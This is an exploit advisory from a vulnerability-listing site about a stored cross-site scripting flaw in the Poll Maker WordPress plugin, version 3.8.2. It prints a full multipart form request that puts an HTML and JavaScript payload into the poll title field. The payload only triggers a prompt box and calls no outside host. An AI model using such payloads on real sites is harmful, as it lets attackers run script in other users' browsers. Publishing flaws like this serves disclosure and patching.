Poll Maker 3.8 - Stored XSS Vulnerability

2022.01.31
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Poll Maker 3.8 - Stored XSS Vulnerability # Exploit Author: Gh05t666nero # Team: INDOGHOSTSEC # Date: 1/02/2022 # Vendor : Poll Maker team # Product: https://wordpress.org/plugins/poll-maker/ # Version: 3.8.2 # Summary: Poll Maker plugin is developed to super easily create amazing online polls for your WordPress website with its basic features. You can use it to conduct elections, surveys, or just as an interactive content provider of your website. # Description: The plugin doesn't escape html tags thus allowing malicious javascript code to be triggered by the server. # Tested on: Wordpress 5.8+ # Vulnerability discovered by Gh05t666nero (Ojan) | Cyber Security Foundation Professional Certificate (CSFPC) # Malicious Request (Demo) MUST LOGIN: https://poll-plugin.com/poll-request/ -----------------------------415896663132509490252901865351 Content-Disposition: form-data; name="ays_poll_title" "><img src=x onerror=prompt();> -----------------------------415896663132509490252901865351 Content-Disposition: form-data; name="ays_poll_select_category" 6 -----------------------------415896663132509490252901865351 Content-Disposition: form-data; name="ays_poll_question" Question Default Title -----------------------------415896663132509490252901865351 Content-Disposition: form-data; name="ays_poll_answers[]" 1 -----------------------------415896663132509490252901865351 Content-Disposition: form-data; name="ays_poll_answers[]" 2 -----------------------------415896663132509490252901865351 Content-Disposition: form-data; name="ays_poll_answers[]" 3 -----------------------------415896663132509490252901865351 Content-Disposition: form-data; name="ays_poll_request_form_submit" Submit -----------------------------415896663132509490252901865351--

References:

https://i.ibb.co/5TNMtsX/Screenshot-16.png


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top